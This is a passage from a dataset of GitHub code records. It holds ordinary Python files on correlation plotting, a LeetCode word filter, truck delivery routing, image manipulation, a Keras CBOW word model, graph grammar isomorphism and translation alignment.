"github-code", "pt": "31", "api": [{"api_name": "PIL.Image.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 33, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "8589520458", "text": "import numpy as np\r\nimport csv \r\nimport plotly.express as px\r\n\r\ndef plot(path):\r\n with open(path) as f:\r\n read_graph = csv.DictReader(f)\r\n fig = px.scatter(read_graph, x = \"Roll No\", y=\"Days Present\")\r\n fig.show()\r\n\r\n\r\ndef open_data(path):\r\n roll = []\r\n days = []\r\n with open(path) as r:\r\n read = csv.DictReader(r)\r\n\r\n for i in read:\r\n roll.append(float(i[\"Roll No\"]))\r\n days.append(float(i[\"Days Present\"]))\r\n\r\n return {\"x\" : roll, \"y\": days} \r\n\r\ndef calc(value):\r\n corr = np.corrcoef(value[\"x\"], value[\"y\"])\r\n print(\"The corelation co-efficient of the above values is: \" ,corr[0,1])\r\n\r\n\r\n\r\ndef main():\r\n path = \"F:\\Python works\\Python Program 2\\WhiteHatJt\\C106\\Student Marks vs Days Present.csv\"\r\n value = open_data(path)\r\n calc(value)\r\n plot(path)\r\n\r\nmain()\r\n\r\n", "repo_name": "Circuit-Overtime/Correlation", "sub_path": "C106d.py", "file_name": "C106d.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "csv.DictReader", "line_number": 7, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 8, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.corrcoef", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "30124326128", "text": "# # Note: we are going to use defaultdict(no keyError because has a default key value) for this problem. \n# One example of defaultdict with set:\n# from collections import defaultdict\n\n# defaultdict_demo = defaultdict(set)\n\n# defaultdict_demo['one'].add(1)\n# defaultdict_demo['two'].add(2)\n# defaultdict_demo['one'].add('1')\n# defaultdict_demo['three']\n \n# -> return:\n \n# {'three': set(), 'two': {2}, 'one': {1, '1'}}\n\n# print(dict(defaultdict_demo.items()))\n\nclass WordFilter:\n\n def __init__(self, words: List[str]):\n from collections import defaultdict\n self.prefixes = defaultdict(set)\n self.suffixes = defaultdict(set)\n \n # weights dictionary contains each word and its index; e.x. {\"apple\":0}\n self.weights = {}\n \n for index, word in enumerate(words):\n prefix, suffix = '', ''\n \n for char in list(word):\n prefix += char\n \n self.prefixes[prefix].add(word)\n # print(self.prefixes)\n for char in list(word[::-1]):\n suffix += char\n self.suffixes[suffix[::-1]].add(word)\n # print(self.suffixes)\n self.weights[word] = index\n # print(self.weights)\n \n\n def f(self, prefix: str, suffix: str) -> int:\n weight = -1\n \n # Note: and is a Logical AND that returns True if both the operands are true whereas '&' is a bitwise operator in Python that acts on bits and performs bit by bit operation. Note: When an integer value is 0, it is considered as False otherwise True when using logically.\n\n \n # print(\"****a\", self.prefixes['a'] ) \n # # -> **** \n # print(\"****e\", self.suffixes['e'] ) \n \n # print(\"****\", self.prefixes['a'] & self.suffixes['e']) \n # -> {'appe', 'apple'} # Note: Find the common words\n # print(\"****\", \"apple\" in self.prefixes[prefix] & self.suffixes[suffix] )\n # -> True\n \n # Note: self.prefixes[prefix] & self.suffixes[suffix] -> returns a set with the common words in both self.prefixes[prefix] & self.suffixes[suffix]\n # -> then we check what word(s) satisfies are in both list (aka contains both prefixes and the suffixes)\n \n # -> We traverse through all available words and find the one with the highest weight!\n \n for word in self.prefixes[prefix] & self.suffixes[suffix]:\n if self.weights[word] > weight:\n weight = self.weights[word]\n return weight\n\n\n# Your WordFilter object will be instantiated and called as such:\n# obj = WordFilter(words)\n# param_1 = obj.f(prefix,suffix)\n", "repo_name": "xulinxi/Leetcode", "sub_path": "DailyChallenge/LC_745.py", "file_name": "LC_745.py", "file_ext": "py", "file_size_in_byte": 2786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "20698843289", "text": "# Omid Ershad\n# Student ID: 011123774\n\n# Import required packages\nimport csv\nimport datetime\n\nimport truck\nfrom create_hash_map import ChainingHashTable\nfrom package import Package\n\n# Initialize hash table to store packages\nhashtable = ChainingHashTable()\n\n# Read package data from CSV\npackage_file = \"package_file.csv\"\naddress_file = \"address_table.csv\"\ndistance_file = \"distance_table.csv\"\n\nwith open(package_file) as package_data:\n package_reader = csv.reader(package_data)\n for package in package_reader:\n # Create package object\n package_id = int(package[0])\n address = package[1]\n city = package[2]\n state = package[3]\n zip = package[4]\n deadline = package[5]\n weight = package[6]\n status = \"At Hub\"\n\n # Create package object and insert into hash table\n package_object = Package(package_id, address, city, state, zip, deadline, weight)\n hashtable.insert(package_id, package_object)\n\n# Read address data from CSV\naddress_list = []\nwith open(address_file) as address_data:\n address_reader = csv.reader(address_data)\n for address in address_reader:\n address_list.append(address)\n\n# Read distance data from CSV\ndistance_list = []\nwith open(distance_file) as distance_data:\n distance_reader = csv.reader(distance_data)\n for distance in distance_reader:\n distance_list.append(distance)\n\n\n# Function to get address index from address list\ndef get_index_for_address(address):\n for address_data in address_list:\n if address == address_data[2]:\n return int(address_data[0])\n return -1\n\n\n# Function to calculate distance between addresses\ndef distance_between_two_addresses(address1, address2):\n address_index1 = get_index_for_address(address1)\n address_index2 = get_index_for_address(address2)\n distance = distance_list[address_index1][address_index2]\n if distance == '':\n distance = distance_list[address_index2][address_index1]\n distance_result = float(distance)\n return distance_result\n\n\n# Create method to deliver packages for given truck\ndef deliver_truck(truck):\n print(truck.package_list)\n current_location = truck.current_address\n for package_id in truck.package_list:\n package = hashtable.search(package_id)\n distance = distance_between_two_addresses(current_location, package.address)\n\n\n# Manually load in packages to trucks\ntruck1 = truck.Truck(truck_id=1, package_list=[1, 13, 14, 15, 16, 20, 29, 30, 31, 34, 37, 40, 19], status=\"Hub\",\n current_address=\"4001 South 700 East\",\n departure_time=datetime.timedelta(hours=8))\ntruck2 = truck.Truck(truck_id=2, package_list=[3, 6, 18, 25, 28, 32, 36, 38, 24, 26, 27, 33, 35], status=\"Hub\",\n current_address=\"4001 South 700 East\",\n departure_time=datetime.timedelta(hours=9, minutes=5))\ntruck3 = truck.Truck(truck_id=3, package_list=[9, 2, 4, 5, 7, 8, 10, 11, 12, 17, 21, 22, 23, 39], status=\"Hub\",\n current_address=\"4001 South 700 East\",\n departure_time=datetime.timedelta(hours=10, minutes=30))\n\nimport copy\n\n# Function to deliver packages for a truck\ndef deliver_packages(truck):\n # Make a deep copy of the truck's package list, so we don't modify the original\n packages = copy.deepcopy(truck.package_list)\n current_time = truck.departure_time\n current_location = truck.current_address\n\n while packages:\n # Find the nearest package\n nearest_package_id = find_nearest_package(current_location, packages)\n package = hashtable.search(nearest_package_id)\n # Update current location\n current_time += 
datetime.timedelta(hours=distance_between_two_addresses(current_location, package.address) / 18)\n truck.mileage += distance_between_two_addresses(current_location, package.address)\n current_location = package.address\n # Deliver it\n package.delivery_time = current_time\n package.departure_time = truck.departure_time\n # Remove delivered package from list\n packages.remove(nearest_package_id)\n\n return current_time\n\n# Define a function to find nearest package\ndef find_nearest_package(current_location, package_ids):\n nearest_distance = float(\"inf\")\n nearest_package_id = None\n\n for package_id in package_ids:\n package = hashtable.search(package_id)\n distance = distance_between_two_addresses(current_location, package.address)\n if distance < nearest_distance:\n nearest_distance = distance\n nearest_package_id = package_id\n\n return nearest_package_id\n\n# Deliver packages for each truck and determine their return times\ntruck1_return = deliver_packages(truck1)\ntruck2_return = deliver_packages(truck2)\nif truck1_return < truck2_return:\n truck3.departure_time = truck1_return\nelse:\n truck3.departure_time = truck2_return\n\n# Fix deliver for package number #9\ndeliver_packages(truck3)\n\n\n# Print total mileage of all trucks combined\ndef print_total_mileage(truck1, truck2, truck3):\n total_mileage = truck1.mileage + truck2.mileage + truck3.mileage\n print(\"Total Mileage:\", total_mileage)\n\n\n# Main loop for user interface\nwhile True:\n print(\"-\" * 40)\n # put mileage here\n print_total_mileage(truck1, truck2, truck3)\n print(\"-\" * 40)\n print(\"1. List all packages with statuses\")\n print(\"2. Get status for specific package\")\n print(\"3. List status for specific time\")\n print(\"0. Exit\")\n\n option = input(\"Enter your option: \")\n if option == \"1\":\n for i in range(1, 41):\n print(hashtable.search(i))\n elif option == \"2\":\n package_number = input(\"Which Package (1-40): \")\n print(hashtable.search(int(package_number)))\n elif option == \"3\":\n test = input(\"Enter a time (HH:MM): \")\n h, m = test.split(\":\")\n user_time = datetime.timedelta(hours=int(h), minutes=int(m))\n for i in range(1, 41):\n print(hashtable.search(i).calculate_status(user_time))\n elif option == \"0\":\n break\n", "repo_name": "omiershad/C950_WGU_Omid_Ershad", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "create_hash_map.ChainingHashTable", "line_number": 13, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 21, "usage_type": "call"}, {"api_name": "package.Package", "line_number": 34, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 40, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 47, "usage_type": "call"}, {"api_name": "truck.package_list", "line_number": 73, "usage_type": "attribute"}, {"api_name": "truck.current_address", "line_number": 74, "usage_type": "attribute"}, {"api_name": "truck.package_list", "line_number": 75, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 77, "usage_type": "attribute"}, {"api_name": "truck.Truck", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 83, "usage_type": "call"}, {"api_name": "truck.Truck", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 86, "usage_type": "call"}, {"api_name": "truck.Truck", 
"line_number": 87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 96, "usage_type": "call"}, {"api_name": "truck.package_list", "line_number": 96, "usage_type": "attribute"}, {"api_name": "truck.departure_time", "line_number": 97, "usage_type": "attribute"}, {"api_name": "truck.current_address", "line_number": 98, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 105, "usage_type": "call"}, {"api_name": "package.address", "line_number": 105, "usage_type": "attribute"}, {"api_name": "truck.mileage", "line_number": 106, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 106, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 107, "usage_type": "attribute"}, {"api_name": "package.delivery_time", "line_number": 109, "usage_type": "attribute"}, {"api_name": "package.departure_time", "line_number": 110, "usage_type": "attribute"}, {"api_name": "truck.departure_time", "line_number": 110, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 123, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 169, "usage_type": "call"}]}
+{"seq_id": "18679274677", "text": "#####################\n# Zadatak 3 #\n#####################\n\n\"\"\"\n Na temelju primjera 2.6. učitajte sliku 'tiger.png'. Manipulacijom odgovarajuće numpy matrice pokušajte:\n a) posvijetliti sliku (povećati brightness),\n b) zarotirati sliku za 90 stupnjeva u smjeru kazaljke na satu,\n c) zrcaliti sliku,\n d) smanjiti rezoluciju slike x puta (npr. 10 puta),\n e) prikazati samo drugu četvrtinu slike po širini, a prikazati sliku cijelu po visini; ostali dijelovi slike trebaju biticrni.\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef show(img):\n plt.figure()\n plt.imshow(img, cmap=\"gray\")\n plt.show()\n\n# read the image into a buffer\nimg = plt.imread(\"../assets/images/tiger.png\", \"png\")\n\n# copy the image into a gray-scale buffer\nimg = img[:, :, 0].copy()\n\n# get the width & the height of the image\nheight, width = img.shape\n\n# show the base image\nshow(img)\n\n# increasing the brightness\nfor i in range(0, len(img)):\n for j in range(0, len(img[i])):\n img[i][j] = img[i][j] * 1.75\n if (img[i][j] > 1.0):\n img[i][j] = 1.0\nshow(img)\n\n# rotate the image 90deg clockwise\nrotated_img = np.zeros((width, height))\nfor y in range(height):\n rotated_img[:, height - 1 - y] = img[y, :]\nshow(rotated_img)\n\n# mirror the image\nrotated_img = np.zeros((height, width))\nfor y in range(height):\n rotated_img[y] = img[height - 1 - y]\nshow(rotated_img)\n\n# scaled down the image\nshow(img[::10, ::10])\n\n# clip the image\nclipped_img = np.zeros((height, width))\nclip_size = width // 4\nclipped_img[:, clip_size : clip_size * 2] = img[:, clip_size : clip_size * 2]\nshow(clipped_img)", "repo_name": "Mat1337/ferit", "sub_path": "machine-lerning/lab_2/zad_3.py", "file_name": "zad_3.py", "file_ext": "py", "file_size_in_byte": 1656, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imread", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "12733317339", "text": "from keras.preprocessing import text\nfrom keras.utils import np_utils\nfrom keras.preprocessing import sequence\nimport keras.backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, Lambda\nfrom keras.models import load_model\nfrom ...lib.utils import word2id, id2word, model, model_path, PreProcess\nimport numpy as np\nimport distance\nimport pickle\n\npre_process = PreProcess()\n\ndef generate_context_word_pairs(wids, vocab_size):\n context_data = []\n label_data = []\n for data in wids:\n context_data.append(data[1:])\n label_data.append(data[0])\n x = sequence.pad_sequences(context_data, maxlen=15)\n y = np_utils.to_categorical(label_data, vocab_size)\n return x, y\n\n\ndef word_train(text_data):\n \"\"\"\n Input : text_data :- List of Setences\n \"\"\"\n try:\n text_data = [pre_process(sent) for sent in text_data]\n tokenizer = text.Tokenizer()\n tokenizer.fit_on_texts(text_data)\n word2id = tokenizer.word_index\n word2id['PAD'] = 0\n id2word = {v:k for k, v in word2id.items()}\n wids = [[word2id[w] for w in text.text_to_word_sequence(doc)] for doc in text_data]\n vocab_size = len(word2id)\n embed_size = 100\n \n context_data, label_data = generate_context_word_pairs(wids, vocab_size)\n \n cbow = Sequential()\n cbow.add(Embedding(input_dim=vocab_size, output_dim=embed_size, input_length=15))\n cbow.add(Lambda(lambda x: K.mean(x, axis=1), output_shape=(embed_size,)))\n cbow.add(Dense(vocab_size, activation='softmax'))\n cbow.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n \n cbow.fit(context_data, label_data, epochs=30, batch_size=10, verbose=2)\n with open('model_path/word_id.pkl', 'wb') as f:\n pickle.dump(word2id, f)\n with open('model_path/id_word.pkl', 'wb') as f:\n pickle.dump(id2word, f)\n cbow.save(\"model_path/cbow_model.h5\")\n return True\n except Exception as e:\n raise Exception(e) \n\n\ndef get_candidate_words(doc, masked_word):\n \"\"\"\n Input text:- Defination of word\n masked_word:- masked character word\n output word:- generate list of candidate words based on Model and words \n are same length as of Masked character word\n \"\"\"\n candidate_words = []\n wids = [word2id[w] for w in text.text_to_word_sequence(doc)]\n d = sequence.pad_sequences([wids], maxlen=15)\n predictied_prob = model.predict(d)\n id_index = np.argsort(predictied_prob[0])[::-1][0:10]\n for ids in id_index:\n word = id2word[ids]\n if len(word) == len(masked_word):\n candidate_words.append(word)\n return candidate_words\n\ndef get_correct_word(masked_word, candidate_words):\n \"\"\"\n Input masked_word:- maksed character word\n candidate_words :- list of canddate word\n output:- Corrected word based on Hamming distance\n \"\"\"\n distances = []\n for word in candidate_words:\n distances.append(distance.hamming(masked_word, word))\n return candidate_words[distances.index(min(distances))]\n\n", "repo_name": "MAYUR192/nlp_chardes", "sub_path": "app/api/models/word_model.py", "file_name": "word_model.py", "file_ext": "py", "file_size_in_byte": 3146, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "lib.utils.PreProcess", "line_number": 13, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 21, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 22, 
"usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 22, "usage_type": "name"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.preprocessing.text", "line_number": 32, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 34, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 35, "usage_type": "name"}, {"api_name": "lib.utils.id2word", "line_number": 36, "usage_type": "name"}, {"api_name": "lib.utils.word2id.items", "line_number": 36, "usage_type": "call"}, {"api_name": "lib.utils.word2id", "line_number": 36, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 37, "usage_type": "name"}, {"api_name": "keras.preprocessing.text.text_to_word_sequence", "line_number": 37, "usage_type": "call"}, {"api_name": "keras.preprocessing.text", "line_number": 37, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 38, "usage_type": "argument"}, {"api_name": "keras.models.Sequential", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.backend.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 45, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 51, "usage_type": "call"}, {"api_name": "lib.utils.word2id", "line_number": 51, "usage_type": "argument"}, {"api_name": "pickle.dump", "line_number": 53, "usage_type": "call"}, {"api_name": "lib.utils.id2word", "line_number": 53, "usage_type": "argument"}, {"api_name": "lib.utils.word2id", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.preprocessing.text.text_to_word_sequence", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.preprocessing.text", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 69, "usage_type": "name"}, {"api_name": "lib.utils.model.predict", "line_number": 70, "usage_type": "call"}, {"api_name": "lib.utils.model", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.argsort", "line_number": 71, "usage_type": "call"}, {"api_name": "lib.utils.id2word", "line_number": 73, "usage_type": "name"}, {"api_name": "distance.hamming", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "74157575768", "text": "import networkx as nx\nimport typing\nimport numpy as np\nfrom general_utils import Attribute\nfrom pprint import pprint as pp\n\n\ndef find_parents(graph: nx.Graph, level: int, label: str) -> list:\n parents = []\n for node in graph.nodes:\n if (\n graph.nodes[node][Attribute.LEVEL] == level - 1\n and graph.nodes[node][Attribute.LABEL] == label\n ):\n parents.append(node)\n return parents\n\n\ndef node_comparator(found_node, searched_node) -> bool:\n return found_node[Attribute.LABEL] == searched_node[Attribute.LABEL]\n\n\ndef node_comparator_factory(level: int) -> typing.Callable:\n def node_comparator(found_node, searched_node) -> bool:\n desired_level = level + searched_node.get(Attribute.LEVEL, 0)\n return (\n found_node[Attribute.LEVEL] == desired_level\n and found_node[Attribute.LABEL] == searched_node[Attribute.LABEL]\n )\n\n return node_comparator\n\n\ndef find_isomporphic(graph: nx.Graph, left_side_graph: nx.Graph, level: int) -> dict:\n isomorphic_graphs = []\n graph_matcher = nx.algorithms.isomorphism.GraphMatcher(\n graph, left_side_graph, node_match=node_comparator_factory(level)\n )\n for isomorphic_graph in graph_matcher.subgraph_isomorphisms_iter():\n # mapping should be directed from template to real graph:\n inversed_isomorphism = {v: k for k, v in isomorphic_graph.items()}\n isomorphic_graphs.append(inversed_isomorphism)\n return isomorphic_graphs\n\n\ndef find_isomorphic_wrapper(\n graph: nx.Graph, left_side_graph: nx.Graph, level: int, constraints: list = None\n) -> dict:\n \"\"\"\n constraints refer to node in left_side_graph.\n Example constraints:\n [{\n 'first_node': 1,\n 'second_node': 2,\n 'constrained_middle_node': 3\n },\n {\n 'node': 4,\n 'constrained_equal_node': 5\n }]\n\n x of 'constrained_middle_node' == (x of 'first_node' + x of 'second_node') / 2\n y of 'constrained_middle_node' == (y of 'first_node' + y of 'second_node') / 2\n x of 'node' == x of 'constrained_equal_node'\n y of 'node' == y of 'constrained_equal_node'\n \"\"\"\n\n def predicate(mapping):\n eps = 1e-4\n checked_constraints = [False for _ in range(len(constraints))]\n\n def check_middle_node_constraint(constraint, i):\n first_node = graph.nodes[mapping[constraint[\"first_node\"]]]\n second_node = graph.nodes[mapping[constraint[\"second_node\"]]]\n expected_node = graph.nodes[mapping[constraint[\"constrained_middle_node\"]]]\n x1, y1 = first_node[Attribute.X], first_node[Attribute.Y]\n x2, y2 = second_node[Attribute.X], second_node[Attribute.Y]\n x3, y3 = expected_node[Attribute.X], expected_node[Attribute.Y]\n if np.abs((x1 + x2) / 2 - x3) < eps and np.abs((y1 + y2) / 2 - y3) < eps:\n checked_constraints[i] = True\n\n def check_equal_nodes_constraint(constraint, i):\n first_node = graph.nodes[mapping[constraint[\"node\"]]]\n second_node = graph.nodes[mapping[constraint[\"constrained_equal_node\"]]]\n x1, y1 = first_node[Attribute.X], first_node[Attribute.Y]\n x2, y2 = second_node[Attribute.X], second_node[Attribute.Y]\n if np.abs(x1 - x2) < eps and np.abs(y1 - y2) < eps:\n checked_constraints[i] = True\n\n for i, constraint in enumerate(constraints):\n constraint_keys = list(constraint.keys())\n if constraint_keys == [\n \"first_node\",\n \"second_node\",\n \"constrained_middle_node\",\n ]:\n check_middle_node_constraint(constraint, i)\n elif constraint_keys == [\"node\", \"constrained_equal_node\"]:\n check_equal_nodes_constraint(constraint, i)\n else:\n raise Exception(\"Invalid constraint\")\n\n return all(checked_constraints)\n\n initially_found = 
find_isomporphic(graph, left_side_graph, level)\n\n # modify later here to add ability to choose which mapping to use\n try:\n return (\n initially_found[0]\n if constraints is None\n else list(filter(predicate, initially_found))[0]\n )\n except IndexError as e:\n return None\n\n\ndef add_to_graph(\n graph: nx.Graph,\n isomorphic_mapping: dict,\n right_side_parent_node: tuple,\n right_side_nodes_new: list,\n right_side_edges: list,\n):\n parent_tmp_node_number = right_side_parent_node[0]\n\n n = len(graph.nodes)\n # find max node number in graph\n for node in graph.nodes:\n n = max(n, node)\n\n right_side_nodes_mapping = {\n node[0]: node[0] + n for node in right_side_nodes_new\n } # define a dictionay mapping old node number (based on right_side_nodes ) => graph node.\n right_side_nodes_mapping[parent_tmp_node_number] = isomorphic_mapping[\n parent_tmp_node_number\n ]\n\n right_side_edges_mapped = list(\n map(\n lambda edge: (\n right_side_nodes_mapping[edge[0]],\n right_side_nodes_mapping[edge[1]],\n ),\n right_side_edges,\n )\n )\n\n right_size_edges_to_parent = [\n (isomorphic_mapping[parent_tmp_node_number], right_side_nodes_mapping[node[0]])\n for node in list(\n filter(lambda node: node[1][Attribute.LABEL] == \"I\", right_side_nodes_new)\n )\n ]\n\n right_side_edges_mapped = right_side_edges_mapped + right_size_edges_to_parent\n\n right_side_nodes_mapped = list(\n map(\n lambda node: (right_side_nodes_mapping[node[0]], node[1]),\n right_side_nodes_new,\n )\n )\n\n existing_node_parent = graph.nodes[isomorphic_mapping[parent_tmp_node_number]]\n\n for node in right_side_nodes_mapped:\n node[1][Attribute.LEVEL] = existing_node_parent[Attribute.LEVEL] + 1\n\n graph.nodes[isomorphic_mapping[parent_tmp_node_number]][\n Attribute.LABEL\n ] = right_side_parent_node[1][Attribute.LABEL]\n\n graph.add_nodes_from(right_side_nodes_mapped)\n graph.add_edges_from(right_side_edges_mapped)\n\n\ndef merge_nodes(graph: nx.Graph, nodes: list, new_node: tuple):\n graph_edges = graph.copy().edges()\n for n in nodes:\n graph.remove_node(n)\n\n graph.add_nodes_from([new_node])\n\n for n1, n2 in graph_edges:\n if n1 in nodes:\n graph.add_edge(new_node[0], n2)\n elif n2 in nodes:\n graph.add_edge(n1, new_node[0])\n", "repo_name": "maciejsikora2302/GramatykiGrafoweGrupa2Sroda1630", "sub_path": "graph_functions.py", "file_name": "graph_functions.py", "file_ext": "py", "file_size_in_byte": 6526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "networkx.Graph", "line_number": 8, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 12, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 13, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 20, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 25, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 25, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 27, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 27, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 28, 
"usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 23, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 34, "usage_type": "attribute"}, {"api_name": "networkx.algorithms.isomorphism.GraphMatcher", "line_number": 36, "usage_type": "call"}, {"api_name": "networkx.algorithms", "line_number": 36, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 47, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 76, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 76, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 76, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 77, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 77, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 77, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 78, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 78, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 79, "usage_type": "call"}, {"api_name": "general_utils.Attribute.X", "line_number": 85, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 85, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 85, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 86, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 86, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 87, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 119, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 152, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 152, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 168, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 168, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 171, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 171, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 172, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 172, "usage_type": "name"}, {"api_name": "networkx.Graph", "line_number": 178, "usage_type": "attribute"}]}
+{"seq_id": "35200288799", "text": "\"\"\"Align target text to reference translation.\n\"\"\"\nimport argparse\n\nWINDOW_SIZE = 30\nMAX_THRESHOLD = 0.9\nMIN_THRESHOLD = 0.4\nVOCAB = 'glove.840B.300d'\nPROGRESS = False\nDEVICE = 'cpu'\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '--target', '-t', required=True,\n help='The target text file to align.')\n parser.add_argument(\n '--reference', '-r', required=True,\n help='The reference translation to align to.')\n parser.add_argument(\n '--output', '-o', required=True,\n help='The output file to write the aligned target text.')\n\n parser.add_argument(\n '--window_size', '-w', type=int, default=WINDOW_SIZE,\n help='The number of reference sentences to compare per target.')\n parser.add_argument(\n '--max_threshold', type=float, default=MAX_THRESHOLD,\n help='The ABLEU threshold to assume best matching sentences.')\n parser.add_argument(\n '--min_threshold', type=float, default=MIN_THRESHOLD,\n help='The minimum 